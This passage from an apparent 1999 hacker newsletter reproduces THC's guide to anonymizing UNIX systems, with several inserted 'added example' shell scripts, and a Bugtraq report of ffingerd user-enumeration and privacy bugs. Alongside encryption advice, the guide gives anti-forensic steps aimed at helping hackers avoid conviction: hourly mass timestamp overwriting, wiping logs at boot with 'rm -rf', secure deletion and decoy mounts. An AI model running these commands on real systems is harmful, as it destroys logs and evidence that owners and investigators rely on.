            IX. EXAMPLE CONFIGURATION AND SCRIPTS
            X. FINAL COMMENTS
                 1. Where to get the tools mentioned in this text
                 2. Additional thoughts
                 3. Greetings (what would the world be without greets?)
                 4. How to contact me for updates or comments
       
       
       
                                                             -------------------- 
       
       
       
       
       * I. THE AUDIENCE 
       
        This text is for any human being out there who wishes to keep their data and doings private from any snooping eye - whether that eye monitors network
        traffic or steals/accesses the computer, electronic forensics included. Hackers, phreakers, criminals, members of democracy parties in totalitarian states,
        human rights workers, and people with high profiles might be interested in this information. It was especially written for novice hackers so they are not so
        easily convicted when busted for their early curiosity. 
        
        Thanks to Solar Designer, Fyodor, typo, tick, pragmatic, mixter and doc holiday for comments, criticism and ideas. 
        Special thanks to rookie who had the original idea of writing this paper but through personal problems couldn't do it himself. 
       
       
       
       * II. GOAL 
       
       Our goal is to provide solutions to the following statements: 
       
            (1) The solution should be simple and easy
            (2) All user data should be inaccessible by anyone except their owner
            (3) Nobody should be able to reconstruct what is happening on the system
       
       Maybe you see contradictions ;-) 
       
       
       
       * III. PREREQUISITES 
       
       It is important to state the prerequisites for this project: 
       
            - The system should be secure. No remote vulnerabilities (and hopefully no local ones either)
             - The system administrator(s) must be trusted and willing to set this up
            - The operating system to achieve this is a UNIX
       
        Note that the solutions presented do not 100% fit internet servers. 
        However it's (nearly, bah ;-) perfect for end-user systems. 
        
        For the UNIX part, we show the solutions for Linux because it is the unix that beginners can most easily get their hands on and administrate. 
        The Linux distribution we use is the SuSE Linux Distribution 6.0. 
        Debian is better but more complicated for beginners. And I dislike redhat for its missing security. 
        You should know enough about unix (what is portmap, mount, rc2.d etc.) before trying to understand this text. It's *not* a Linux-Howto! 
       
       
       
       * IV. USER DATA 
       *** 1. Sensitive user data 
       
       What is sensitive user data? Well *any* data from a user account. This includes: 
       
            - utmp/wtmp/lastlog data (login times and duration plus login hosts)
            - history files (what commands you typed in your session)
            - your emails
            - temporary files from applications like mailers, browsers etc.
            - applications and their configuration
             - your own data (documents, porn pics, confidential data)
             - time stamps on your data (when were you accessing/editing which data)
             - on multiuser systems: what users are CURRENTLY doing. This includes the process listing and network connections as well as utmp (which is already
               covered by another category). -> make /proc more restrictive.
       
       
       We are trying to protect all this data. 
        Note that utmp/wtmp/lastlog data and mail (mqueue/mail/fax/lpd) are handled in the SYSTEM DATA section. 
       Note that all user accounts can be seen from /etc/passwd ;-) So maybe you'd like to add some/many fake accounts, together with homedirs and crypted data ... 
       
       
       *** 2. Protecting /home directories 
       
        Most important for protecting user data is protecting the users' /home directories. 
        Each home directory must be encrypted with a strong cipher so that even with full physical access to the system the data can't be obtained. Currently I know of only
        one piece of software providing a solution to our requirements: CFS - the cryptographic filesystem. 
        
        There are also some other crypto solutions available: TCFS, SFS and the loop filesystem with crypt support. They are faster but have the disadvantage that
        you'll have to recompile your kernel with patches from these tools. So for the sake of ease, I stick with CFS here. (Pointers to all tools mentioned in this text can
        be found at the end.) 
       
        To enable CFS we must put these six lines in a rc2.d script: 
        
                portmap                                  # sunrpc portmapper, needed by mountd and cfsd
                rpc.mountd -P 894                        # mountd should bind to port 894
                cfsd 895                                 # cfsd   should bind to port 895
                rm -rf /tmp/.tmp                         # fresh, private (mode 700) directory that cfsd exports
                mkdir -p -m 700 /tmp/.tmp
                mount -o port=895,intr localhost:/tmp/.tmp /home   # NFS-mount cfsd's decrypting view as /home
       
        Additionally we have to put this entry into /etc/exports: 
       
               /tmp/.tmp       localhost
       
       
       
        Okay. This starts sunrpc with the mount daemon, which are necessary for CFS to be started and used. 
        Now we need to get the following going: if a user logs on, the system has to check if he's already logged in to decide whether to decrypt the user's home directory.
        This sounds hard but is easy: the user's /home/user directory doesn't exist (and even if it did, the mount command above would hide it),
        so the user's HOME variable is set to '/', the root directory. Then his login shell is started, which looks for its start scripts. And that's where we put our hooks in. 
        We create (this example is for bash) the file /.profile with the following contents: 
       
                cattach /crypt/$USER $USER  ||  exit 0    # attach the crypted dir as /home/$USER; wrong passphrase -> logged out
                export HOME=/home/$USER                   # the real home directory exists now
                cd $HOME
                if test -f $HOME/.profile; then           # continue with the user's own profile
                        . $HOME/.profile
                fi
       
       
       When a user logs on the first time, this script will be executed. The user has to enter the password for his crypted homedir, and after this his correct HOME variable
       is set and the normal login profile is read and done. If a user doesn't know the passphrase for his crypted homedir, he is logged out. 
       
       But how do we remove the decrypted homedir after the user logs out? This script should be clever, because a user could be logged in several times at once, and it
       should only be removed when the last loginshell exits. 
       Thank god, this is easy too, we create a /home/user/.bash_logout script: 
       
                # count this user's login shells. The shell itself and the subshell forked for the
                # backticks both show up, so fewer than 3 matches means no other session is left.
                shells=`ps xu | grep -- "$USER .* S .* -[^ ]*sh" | wc -l`
                test $shells -lt 3 || exit 0     # other sessions remain: leave the homedir attached
                export HOME=/
                cd /
                cdetach $USER                    # remove the decrypted view of the homedir
       
       
        That's all. From now on, the users' home directories are safe. 
        
        Note that a user can't log in now, start a background job which writes data to his home directory and log out, because his home directory would be removed. The full
        .bash_logout script I provide in section IX checks for a $HOME/.keep file and if present doesn't remove the homedir. 
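        The logout hook has to cope with a user who is logged in several times at once, and the full script adds the $HOME/.keep marker. The block below is an added example (not the paper's script and not THC code) that isolates both decisions in shell functions and runs them against a constructed `ps xu` listing, so the rule can be checked without a live CFS setup. The user name alice, the PIDs and the path /home/alice are made up; on a real system `sample_ps` would be replaced by `ps xu` and the echo by `cdetach "$USER"`.

```shell
#!/bin/sh
# Added example (not the THC paper's script): the logout decision behind
# .bash_logout, split into functions so the rule can be tested on a
# constructed `ps xu` listing instead of a live system.

# Count login shells owned by user $1 in a `ps xu`-style listing read from
# stdin.  `ps xu` prints USER in field 1 and COMMAND from field 11 on; a
# login shell shows up with a leading dash ("-bash", "-sh", "-zsh").
count_login_shells() {
    awk -v u="$1" '
        NR > 1 && $1 == u && $11 ~ /^-[^ ]*sh$/ { n++ }
        END { print n + 0 }
    '
}

# Succeed (exit 0) when the home directory should be detached now: no
# $2/.keep marker and no other login shell of user $1 in the listing $3.
# The shell that is executing .bash_logout is still listed, so a single
# matching line means "this is the last session".
should_detach() {
    user="$1"; home="$2"; pslist="$3"
    if [ -f "$home/.keep" ]; then
        return 1                      # user asked to keep the homedir attached
    fi
    shells=$(count_login_shells "$user" < "$pslist")
    [ "$shells" -le 1 ]
}

# Constructed `ps xu` output (made up for this example): alice has two
# login shells, so logging out of one of them must not detach /home/alice.
sample_ps() {
    cat <<'EOF'
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
alice      812  0.0  0.5  2100 1200 tty1     S    10:02   0:00 -bash
alice      901  0.0  0.5  2104 1208 pts/0    S    10:15   0:00 -bash
alice      933  0.0  0.3  1800  900 pts/0    S    10:16   0:00 vi notes.txt
alice      940  0.0  0.2  1500  700 pts/0    R    10:20   0:00 ps xu
EOF
}

# What .bash_logout would do with a live listing: replace sample_ps with
# `ps xu` and the first echo with `cdetach "$USER"`.
demo() {
    tmp=$(mktemp)
    sample_ps > "$tmp"
    echo "login shells: $(count_login_shells alice < "$tmp")"
    if should_detach alice /home/alice "$tmp"; then
        echo "last session: would run cdetach alice"
    else
        echo "other sessions or .keep present: homedir stays attached"
    fi
    rm -f "$tmp"
}

demo
```

        Because the listing is read from a file, the count is exact; with a live `ps xu` the copy of the shell forked for the command substitution is listed as well, which is why the paper's script tests for fewer than 3 matches where this example tests for at most 1.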
       
       For network logins you should keep in mind that they should not be done via rlogin, telnet, etc. because they send all traffic (including passwords) in plaintext over
       the network. You should use a tool which encrypts the whole traffic like SSLtelnet or SSH (for SSH you need to set "UseLogin yes" in the /etc/sshd_config file). 
       
       You'll find all these scripts with error checking, user creating, stop scripts and config files etc. in section IX. EXAMPLE CONFIGURATION 
       
        Note that we started daemons in this section which can be contacted from remote. If you don't want this (because there are no external users who need to mount
        their crypted user data on their own machine) you should firewall these ports. Look in your manpages ("man ipchains" or "man ipfwadm"). 
       
       
       *** 3. Traceable user activity 
       
        [Warning, this section shows first how to perform simple electronic forensics] 
        It is easy to see who logged on to the system and what he did by the timestamps. Even if all your data is crypted, by checking the last access time (atime) of your files,
        someone may check when you logged in last time, for what duration, and whether you were idling or doing much stuff. 
        If the system doesn't have many users, someone might even tell what you did. 
       
       Example: The earliest access time for a crypted file in your homedir can be seen by: 
       
               ls -altur /crypt/$USER | head -1 # shows the logout file
               ls -altu  /crypt/$USER | more    # with some brain you'll find
                                                # the login time
       
       
        then you also have the duration of the session. 
        By checking the change/modification and access time of those crypted files with their timestamps someone can see how hard you were working, and draw more
        conclusions (e.g. if many files nested in a three levels deep directory were modified this is probably a browser - so you were surfing the net). 
       
       This insight will now make it possible to check what commands were run: 
        Let's say the login time was 22 hours ago, so you run: 
       
               find / -type f -atime 0 -ls # shows the accessed files
               find / -type f -mtime 0 -ls # shows the modified files
       
       
       (this can be done with directories too) 
       
       Now check the output for the correct timeframe and analyze what you found. e.g. the telnet client was accessed. So it's probable, the user used it to connect to
       another system. I think you can imagine now what is possible. 
       
       To protect against this is also very easy: 
       Create the file /usr/local/bin/touch_them and make it executable with the following contents: 
       
               find /crypt /tmp /etc /var/spool 2> /dev/null | xargs -n 250 touch
       
       
       Then put the following line into /etc/crontab: 
       
               50 * * * *      root   /usr/local/bin/touch_them
       
       
        finally you change the fourth field of all lines in /etc/fstab which have the keyword "ext2" in their third field (the filesystem type): 
        
                 defaults          (or anything else)
        
        should become 
        
                 defaults,noatime  (the old value is kept, and noatime is appended)
       
       
       example: 
       
                /dev/hda1   /    ext2   defaults  1  1
       
       becomes 
       
                /dev/hda1   /    ext2   defaults,noatime  1  1
       
       
       What did we achieve? The crontab entry with the small script updates the atime, mtime and ctime to the current time every hour of special directories - especially
       those which may hold user data. 
       The mount options we changed now prevent the update of the atime. However, this needs a current 2.2.x kernel - it isn't implemented on the 2.0 kernel tree! 
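        Editing /etc/fstab by hand is where this procedure usually goes wrong: an ext2 line gets missed, or noatime is appended twice. The following is an added example, not from the paper, that does the rewrite with awk on a constructed fstab: every ext2 entry gets noatime appended to its fourth field, comments and other filesystem types are left alone, and entries that already carry the option are not changed. The device names and mount points in the sample are made up.

```shell
#!/bin/sh
# Added example (not from the THC paper): add noatime to every ext2 entry
# of an fstab, skipping comments, other filesystem types and entries that
# already carry the option.  Reads the fstab on stdin, writes to stdout,
# so the result can be diffed against /etc/fstab before it is installed.

add_noatime() {
    awk -v OFS='  ' '
        /^[ \t]*#/ || NF < 4 { print; next }      # comments, blanks, odd lines: untouched
        $3 == "ext2" && ("," $4 ",") !~ /,noatime,/ {
            $4 = $4 ",noatime"                   # keep the old options, append noatime
        }
        { print }                                # rebuilt with OFS only when $4 was changed
    '
}

# List mount points of ext2 entries that still lack noatime; empty output
# means the file is fully converted.  Useful as a check after a manual edit.
missing_noatime() {
    awk '!/^[ \t]*#/ && NF >= 4 && $3 == "ext2" && ("," $4 ",") !~ /,noatime,/ { print $2 }'
}

# Constructed sample fstab (made up for this example, not a real system's file).
sample_fstab() {
    cat <<'EOF'
# /etc/fstab  (constructed sample)
/dev/hda1   /       ext2   defaults          1  1
/dev/hda2   /home   ext2   defaults,noatime  1  2
/dev/hda3   swap    swap   defaults          0  0
proc        /proc   proc   defaults          0  0
EOF
}

# Typical use on a real system (review the diff before copying it back):
#   add_noatime < /etc/fstab > /tmp/fstab.new && diff /etc/fstab /tmp/fstab.new
sample_fstab | add_noatime
```

        Lines that are rewritten come out with two spaces between fields instead of the original alignment; lines that did not need the option are printed verbatim. Remember that, as the paper says, noatime only takes effect on a 2.2.x kernel.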
       
       
       *** 4. Protecting /var/spool/* files 
       
       /var/spool/mail : 
       Now it gets tricky. How can we protect the new mail for a user from spying eyes? It can't be sent directly to a user's homedir like qmail would do because it's
       crypted. The easiest solution is to use pgp to encrypt your outgoing emails and tell all your friends that they should also encrypt all emails to you. 
       
        However, this is not satisfying. An attacker can still see who sent the user the email. The only possibility to hide this is using an anonymous remailer. This is not a great
        solution, so this is an open point (see section X.2: Additional thoughts). 
       
       /var/spool/{mqueue|fax|lpd} : 
       Well, all you can do is try to flush the queues when shutting down. 
       After that you have to decide if you delete the remaining files in a secure way or leave it where it is. Or program a special script which does something with the data
        (like tarring the data and encrypting it with pgp, doing the reverse when the system is rebooted). 
       
       You can also create a whole crypted /var partition, but that would require someone at the console while booting the system - every time. 
       
       
       
       * V. SYSTEM DATA 
       *** 1. Sensitive system data 
       
       What is sensitive system data? *Anything* which gives conclusion on incoming and outgoing data, configuration files, logs, reboots and shutdowns. 
       
       This includes: 
       
            - utmp/wtmp/lastlog data (boot, reboot, shutdown times + user times)
            - ppp dialup script
            - sendmail and tcp wrapper configurations
            - proxy cache data (e.g. squid web/ftp proxy)
            - syslog messages
            - /var/spool/* data {mqueue|fax|lpd|mail}
            - temporary files from daemons
            - time stamps on data (when were what data accessed/edited)
       
       
        How to prevent time stamp forensics is described in section IV.3. 
        How to protect /var/spool/* data is described in section IV.4 (an incomplete solution). 
       
       *** 2. Traceable system activity 
       
        (Prevention of time stamp forensics is handled in section IV.3.) To trace system activity, you can easily check the temporary files of daemons and applications. Some
        of them write to /tmp; root applications usually (should) write to /var/run. We handle this together with section V.3: Logging. All you have to do is this, and only *once*: 
       
               cd /var
               mv run log
               ln -s log/run run
       
       
        This moves the /var/run directory to /var/log/run and sets a symlink in its former place so that applications still find their files. 
       
       *** 3. Logging - important and dangerous 
       
        Logging is important to trace problems like misconfigurations. 
        Logging is dangerous because an attacker can see important data in the logfiles, like the users' login and logout times, whether they executed "su" or other commands, etc. 
        We try to find a balance between these. 
        Our solution: Write all log data to one special directory. 
        This directory is a RAM disk, so the data is lost after a system shutdown. Ensure that syslogd [/etc/syslog.conf] and daemons (e.g. httpd [apache]) only write to our
        special logging directory or to a system console. /var/log should be used as our special logging directory. 
       
       
       Now we put the following commands into /sbin/init.d/boot.local: 
       
                umask 027
                mke2fs -m0 /dev/ram0 1> /dev/null 2>&1          # fresh ext2 filesystem on the RAM disk
                rm -rf /var/log/* 2> /dev/null                  # nothing survives from the previous boot
                mount -t ext2 /dev/ram0 /var/log
                chmod 751 /var/log
                cd /var/log
                mkdir -m 775 run                                # /var/run lives here now (see section V.2)
                chgrp uucp run
                for i in `grep /var/log /etc/syslog.conf|grep -v '^#'| \
                 awk '{print $2}'|sed 's/^-//'`                 # recreate every logfile syslog.conf names
                    do > $i ; done
                umask 007               # 002 might be used too.
                for i in run/utmp wtmp lastlog
                    do > $i ; chgrp tty $i ; done               # readable by root and group tty only
                cd /
                kill -HUP `pidof syslogd` 2> /dev/null          # make syslogd reopen its logfiles
       
        After your next reboot it behaves as described above. 
       
        Some of you will not like the idea of having no logs after a reboot. This way you can't trace an intruder or guess from your logs what crashed the machine. Either you
        can tar the files and pgp them before the shutdown is complete (but the data would be lost if a crash occurs), or you might also use ssyslog or syslog-ng, special
        syslogs with encryption capabilities, and write the data you really want to keep to (just an example) /var/slog. 
        
        You can also create a whole encrypted /var partition, but that would require someone at the console while booting the system - every time. 
       
       
       *** 4. Protecting system configs 
       
        This is tricky. It is easy to achieve, but for a price. If we create an account with uid 0 whose homedir is in /home and is hence protected by our CFS configuration,
        you need to be at the console at every reboot. This isn't practical for server systems that need to be administrated and rebooted remotely. This solution is only good
        for end-user PCs. 
        
        Just create an account with the uid 0 (e.g. with the login name "admin"). You can use the create_user script from section IX. 
        Put all the sensitive configuration files you want to protect into this homedir (ppp dialup scripts, sendmail.cf configs, squid configs with their cache directory set to
        a subdir of "admin", etc.). 
        Now create a small shellscript which starts these daemons with a command line option to use the config files in your "admin" homedir. 
        
        Your system is then secure against extraction of the sensitive information from the config files. But for a price. You have to log in after each reboot as user
        "admin", enter your CFS passphrase and start the script. 
       
       
       *** 5. Computer Memory and sensitive /proc interfaces 
       
        For a real multiuser system on which the administrator additionally wants to ensure the privacy of the users online, he has to hide the user process information a
        user would normally see when issuing a "who" or "ps" command. To protect the users' process information, you can use Solar Designer's secure-linux kernel patch. To
        protect utmp/wtmp/lastlog we ensure that these files are only readable by root and group tty, hence a normal user can't access this data. (This is done in the
        boot.local example script.) 
        Now one problem is left. Even with normal RAM a well funded organisation can get the contents after the system is powered off. With modern SDRAM it's
        even worse: the data stays in the RAM permanently until new data is written. For this, I introduced a small tool in the secure_delete package 2.1, called
        "smem", which tries to clean the memory. It should be called on shutdown. This is done in the example in section VI.4. 
       
       
       
       * VI. DELETE(D) DATA AND SWAP 
        *** 1. How to delete files in a secure way 
       
        When a file is deleted, only the inode data is freed; the contents of the data are NOT wiped and can be gathered with tools like "dd" or the tool manipulate_data
        from THC. 
        
        Peter Gutmann wrote a paper with the name "Secure Deletion of Data from Magnetic and Solid-State Memory", presented in 1996 at the 6th Usenix Security
        Symposium. This is the best civilian paper on how to wipe data in a way that makes it hard even for electron microscopes to regain the data. 
        There are four tools out there which use the techniques described there: two called "wipe", one called "srm" from THC's secure_delete package, and "shred", which
        is part of the new fileutils package from GNU. 
        Ours is still the best in its design, features and security, and it also has all the important and advanced commandline options and the speed you need. 
       
       To use one of these tools for deletion just set an alias in /etc/profile: 
       
               alias rm=srm      # or wipe or shred
       
        or, even better, move /bin/rm to /bin/rm.orig and copy the secure delete program to /bin/rm. This ensures that all data which is deleted via rm is securely wiped. 
       
        If you can't install THC's secure_delete package or any other (for any reason), you can also set the secure deletion attribute of the ext2 filesystem on files you wish
        to wipe before rm'ing them. It's nearly the same, but it's NOT a secure wipe like the ones mentioned above. It's set by: 
       
               chattr +s filename(s)
       
       
       
       [Note that it is *still* possible for a well funded organisation to get your data. Don't rely on this! See section VI.4 !] 
       
       
       *** 2. How to wipe free disk space 
       
        Most of the time, applications like the editor in your mail program write a temporary file. And you don't know about it - you weren't even asked :( Because they
        don't wipe the data in a secure way, an attacker can get all your private emails just because you didn't know. That's bad. 
        The solution: You use a wiper program which cleans all unused space on the disk partitions. 
        The only one available is the one from THC's secure_delete package. You could put "sfill" (that is what it is called) in your crontab so it is run regularly, but this
        might create problems when at that moment the space is needed by an important application. At the least, sfill should be called when the system shuts down. 
        Put this in the "stop" part of a late rc2.d script: 
       
               sfill -llf /tmp 2> /dev/null
               sfill -llf /var/spool 2> /dev/null
       
       
       
        Note that it is a good idea to create a separate partition for /tmp itself, and to put symlinks from /usr/tmp and /var/tmp to /tmp. This way it is easier to control
        and wipe. 
       
        Again, if you can't install the secure_delete package for any reason, you can also use this solution (slower and not as secure): 
       
               dd if=/dev/zero of=/tmp/cleanup
               sync
               rm /tmp/cleanup
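        The following is an added example, not code from the original text and not THC's secure_delete package: a minimal srm/sfill-style wiper in POSIX sh that shows what the tools in sections VI.1 and VI.2 do on ext2 (overwrite the file's blocks in place, destroy the directory entry, unlink; fill the free space and remove the fill file). The function names overwrite_file, wipe_file and wipe_free_space are hypothetical, and the MAXBLOCKS cap exists only so the demonstration does not fill a real disk.

```shell
#!/bin/sh
# Added example (hypothetical helpers, not from the original text or from
# THC's secure_delete). Assumes POSIX sh with dd, od, wc and sync.
# Caveat: overwriting in place only reaches the original blocks on a
# filesystem that rewrites in place, as ext2 does. Journaling and
# copy-on-write filesystems, snapshots and flash wear levelling may keep
# older copies, so there this is no substitute for encrypting the data.

BLOCK=4096

# overwrite_file FILE [PASSES]
# Overwrite FILE's blocks with PASSES passes of random data and a final
# pass of zeros. Refuses symlinks and non-regular files so that a link
# target is never touched.
overwrite_file() {
    f=$1
    passes=${2:-3}
    if [ -L "$f" ] || [ ! -f "$f" ]; then
        echo "overwrite_file: $f is not a regular file, refusing" >&2
        return 1
    fi
    size=$(wc -c < "$f" | tr -d ' ')
    [ "$size" -eq 0 ] && return 0
    # Round up to whole blocks so the slack at the end of the last block,
    # which may still hold remnants of older content, is overwritten too.
    blocks=$(( (size + BLOCK - 1) / BLOCK ))
    i=0
    while [ "$i" -lt "$passes" ]; do
        dd if=/dev/urandom of="$f" bs=$BLOCK count="$blocks" conv=notrunc 2>/dev/null || return 1
        sync
        i=$(( i + 1 ))
    done
    dd if=/dev/zero of="$f" bs=$BLOCK count="$blocks" conv=notrunc 2>/dev/null || return 1
    sync
}

# wipe_file FILE [PASSES]
# Overwrite FILE, then rename it to a random name before unlinking so the
# old filename no longer sits in the directory block either.
wipe_file() {
    f=$1
    overwrite_file "$f" "${2:-3}" || return 1
    dir=$(dirname "$f")
    rnd=$(od -An -N4 -tx1 /dev/urandom | tr -d ' \n')
    tmp="$dir/.wipe.$$.$rnd"
    mv "$f" "$tmp" && sync && rm -f "$tmp"
}

# wipe_free_space DIR [MAXBLOCKS]
# Fill the free space of the filesystem holding DIR with random data,
# sync, then remove the fill file: the dd trick from the text, with random
# data instead of zeros. MAXBLOCKS caps the fill for demonstration; without
# it dd runs until ENOSPC, whose non-zero exit is the expected outcome.
wipe_free_space() {
    d=$1
    fill="$d/.sfill.$$"
    if [ -n "$2" ]; then
        dd if=/dev/urandom of="$fill" bs=$BLOCK count="$2" 2>/dev/null || true
    else
        dd if=/dev/urandom of="$fill" bs=$BLOCK 2>/dev/null || true
    fi
    sync
    rm -f "$fill"
}
```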
       
       
       
       
       *** 3. How to handle swap data 
       
        Securely wiping files and free diskspace - well, what's left? Today, harddisk MBs are cheaper than RAM; that's why swap space is used to expand the available
        RAM. This is in reality a file or partition on your harddisk, and it can contain your sensitive data. 
        
        Again there is only one tool which helps you out here: "sswap" from THC's secure_delete package ;-) 
        Put this line after the "swapoff" line in /sbin/init.d/halt: 
       
               sswap -l /dev/XXXX     # the device for your swap, check /etc/fstab
       
       
       
       
       *** 4. How to handle RAM 
       
        In section V.5 I wrote about sensitive information in your RAM, the fast memory of your computer system. It can hold very sensitive information like the email you
        wrote before pgp'ing it, passwords, anything. 
        To ensure that the memory is cleaned, use the smem utility. 
        It should be called like this in the stop part of a late rc2.d script (as already mentioned above), after wiping the files in /tmp etc. and the free disk space: 
       
               smem -ll
       
       
       
       
       *** 5. Temporary data - it is evil 
       
        After you have secured/anonymized/privatized your system so far, everything's ready - or did you forget something? 
        Remember what we told you in section VI.1: temporary data is written somewhere, and sometimes you don't know where. If you are unlucky, all we've done here was
        useless. We have to ensure that there's no temporary data left on the devices and that it can't be recovered either. 
        We already dealt with /var/log, /var/run and sent email (/var/spool/...), and we wipe all free diskspace from our temporary disk locations. Now we must also wipe
        the temporary data itself. 
        Put this line in the stop part of a late rc2.d script (before sfill from VI.3): 
       
               ( cd /tmp ; ls -A | xargs -n 250 srm -r ; )
       
        Also, a $USER/tmp directory should be created for all users under the CFS /home protection, and a TMPDIR variable set to this directory. 
       
       See section IX. for all these scripts ... 
       
       
       
       * VII. NETWORK CONNECTIONS 
       
        This is a very specialized area of this document. I describe here a few ways in which someone can protect some of their data being transferred on the internet. 
        
        The basic prerequisites are as follows: You've got an external POP3 and SMTP server (mail relayer) where you receive and send your email. When you go on irc, you
        also don't like your real hostname being printed on the channels. 
        
        Your external mail server should be in another country, because if some official agencies think you're doing something illegal (and I'm sure you won't) it's
        harder to get a search warrant. It's also harder because companies or individuals that try to get your data would need to invest more time, work and money to get it. 
        
        You can tunnel your SMTP and POP3 via ssh to the external mail server. 
        For POP3 this is easy, but for SMTP this is a bit harder. 
        Just as an example, irc traffic can be tunneled through this as well, but dcc stuff won't work (one way doesn't work, the other would reveal your ip address to the
        sender, and the data is not encrypted on any part of the internet). 
        Note that you can also use redirectors and proxies to accomplish further redirecting for other protocols (www, irc, ftp proxies etc.). 
        
        That's all. All mail traffic (and, as you can see below, irc traffic too) is encrypted between you and your mail/proxy server. 
       
       sendmail.cf (important parts): 
       
               DSsmtp:[127.0.0.1]
               DjTHE_DOMAIN_NAME_OF_YOUR_EMAIL
               DMTHE_DOMAIN_NAME_OF_YOUR_EMAIL
                - Msmtp,          P=[IPC], F=mDFMuX, S=11/31, R=21, E=\r\n, L=990,
                + Msmtp,          P=[IPC], F=mDFMuXk, S=11/31, R=21, E=\r\n, L=990,
       
        (add the "k" flag to the F= flags of the Msmtp mailer line) 
       
       ~user/.fetchmailrc: 
       
               poll localhost protocol POP3:
                   user USER_REMOTE with pass PASSWORD_REMOTE is USER_LOCAL here
                   mda "/usr/sbin/sendmail -oem USER_LOCAL"
       
       (enter the corresponding USER_* and PASSWORD in here) 
       
       The ssh commandline which tunnels the traffic for POP3, SMTP and irc: 
       
               ssh -a -f -x -L 110:localhost:110 -L 6667:irc.server.com:6667 -L \
                   25:localhost:25 your_mail_server.com
       
       
       
       That's all. I won't tell you more. Use your brain ;-) 
       
       
       
        * VIII. HIDING PRIVACY SETTINGS 
        *** 1. Mount is your friend 
       
       Take a look at the following commands: 
       
       # ls -l /home
       total 3
       drwxr-x---   1 root     root         1024 Mar 28 14:53 admin
       drwxr-x---   1 vh       thc          1024 Mar 28 16:22 vh
       drwxr-x---   1 user     users        1024 Mar 28 11:22 user
       # mount -t ext2 /dev/hda11 /home      # or a ramdisk, doesn't matter
       # ls -l /home
       total 0
       # : whoops, where are the homedirs ?
       # umount /home
       # ls -al /home
       total 3
       drwxr-x---   1 root     root         1024 Mar 28 14:53 admin
       drwxr-x---   1 vh       thc          1024 Mar 28 16:22 vh
       drwxr-x---   1 user     users        1024 Mar 28 11:22 user
       # : ah, yeah there they are again ...
       
        This is a nice feature to hide your encrypted data and binaries. Just put your files into e.g. /usr/local/bin and /usr/local/crypt and mount a decoy filesystem over
        /usr/local. If you then have a process started in your boot scripts which holds a file open on the decoy filesystem, the filesystem can't be unmounted until the
        process is killed. This way, it's much harder for someone to detect your data! 
       
       
        *** 2. Removable Media 
        
        An even better possibility: put all your sensitive data on removable media. Put your media in, mount it, then run the start script from it to activate all the privacy
        stuff. This way you've made it one step harder for someone to find out what's going on. 
       
       *** 3. ??? 
       
       Any other ideas? Think about it! (and maybe send me your ideas ;-) 
       
       
       
       * IX. EXAMPLE CONFIGURATION AND SCRIPTS 
       
        The example configuration and scripts are available as the anonymous-unix-0.7.tar.gz tools package. 
       
       
       
       * X. FINAL COMMENTS 
       *** 1. Where to get the tools mentioned in this text 
       
       - Crypto Filesystems 
       
            CFS (Cryptographic File System) http://www.replay.com
            TCFS (Transparent CFS) ftp://mikonos.dia.unisa.it/pub/tcfs/
            SFS (Stegano File System) http://www.linux-security.org/sfs
            Crypto Loopback Filesystem ftp://ftp.csua.berkeley.edu/pub/cypherpunks/filesystems/linux/
       
       - Tools 
       
            THC's secure_delete package http://www.infowar.co.uk/thc
            secure-linux kernel patch http://www.false.com/security
            syslog-ng http://www.balabit.hu/products/syslog-ng.htm
             ssyslog http://www.core-sdi.com/ssyslog
       
       - The example Linux Distribution 
       
            SuSE Linux Distribution http://www.suse.com
       
       
       *** 2. Additional thoughts 
       
       The following problems are still present: 
       
             - If an attacker can gain access to the system without rebooting, and in time before data is wiped, unmounted, etc., these countermeasures are worthless.
        
             - If a really well funded organisation is trying to decrypt your data via brute force/dictionary attacks or good electron microscopes and technical staff with
             excellent knowhow, your wiping won't help you very much.
        
             - The solution for /var/spool/mail and /var/spool/mqueue etc. is far from perfect. Remember this. Ideas welcome.
        
             - The configuration of your system daemons can only be secured if you are present at the console after a reboot. That's the price.
        
             - It is not very hard to detect the privacy measures taken. This might get you in trouble in countries like China or Iran. Removable media might help, or try a
             crypto filesystem with stegano support.
       
       
       Secure your system against unauthorized (from your point of view) access and use strong passwords. 
       
       
       *** 3. Greetings (what would the world be without greets?) 
       
       What would the world be without love and greetings? ;-) 
       
       Greets to individuals (in alphabetic order): 
       
            Doc Holiday, Froody, Fyodor, plasmoid, pragmatic, rookie, Solar Designer, Tick, Wilkins.
       
       
       Greets to groups: 
       
            ADM, THC (of course ;-) and arF
       
       
       Greets to channel members: 
       
            #bluebox, #hack, #hax, #!adm and #ccc
       
       
       
       *** 4. How to contact me for updates or comments 
       
        Please send me any further ideas you've got to make this documentation better! Did I write bad bad English in some part? Could I rephrase parts to make them easier
        to understand? What is wrong? What's missing? van Hauser / THC - [The Hacker's Choice] 
       
       
       
       THC's Webpage -> http://r3wt.base.org 
       (or http://thc.pimmel.com or http://www.infowar.co.uk/thc) 
       
       
       Type Bits/KeyID    Date       User ID
       pub  2048/CDD6A571 1998/04/27 van Hauser / THC <vh@reptile.rug.ac.be>
       
       
       @HWA
       
 22.0  Ffingerd vulnerability
       ~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Fri, 23 Apr 1999 19:26:13 +0300
       From: Eilon Gishri <eilon@ARISTO.TAU.AC.IL>
       To: BUGTRAQ@netspace.org
       Subject: Ffingerd privacy issues
       
       Hi,
         I found a couple of bugs in ffingerd 1.19 which are related to
       privacy.
       
       Here goes:
       
        The permissions on root's home directory are now 700 (/home/root).
       
       -----
       (aristo)/cc/eilon>finger root@host.domain
       [host.domain]
       Login: root                            Name: #6
       
       No project.
       No plan.
       No public key.
       -----
       
        A lesson in how not to be seen. On host.domain, the user doesn't want
        to be seen (please stand up :)). Too bad, his/her home directory's
        permissions (which say 'I want some privacy') make ffingerd state
        otherwise. Ffingerd looks for the file .nofinger in the user's home
        directory but due to the current state of permissions on it, it can't
        be accessed, thus "there is no such file" and therefore it is happy to
        supply us with the user's information.
       
       -----
       # cd ~root
       # ls -l .nofinger
       -rw-r--r--   1 root     system         0 Apr 23 18:01 .nofinger
       # ls -ld .
       drwx------   5 root     system       512 Apr 23 18:01 .
       # chmod 755 .
       -----
       
        Now let's try again.
       
       -----
       (aristo)/cc/eilon>finger root@host.domain
       [host.domain]
       That user does not want to be fingered
       -----
       
       Hmmm, now for an unknown user.
       
       -----
       (aristo)/cc/eilon>finger root1@host.domain
       [host.domain]
       That user does not want to be fingered.
       -----
       
       Oops. Notice the dot ('.') at the end of the sentence. A very simple
       and efficient way to find whether the user exists on the remote host
       or not (taking into account the fact that ffingerd has been installed
       on the remote host).
       
        Attached here is a patch to fix those problems.
       
       -- 
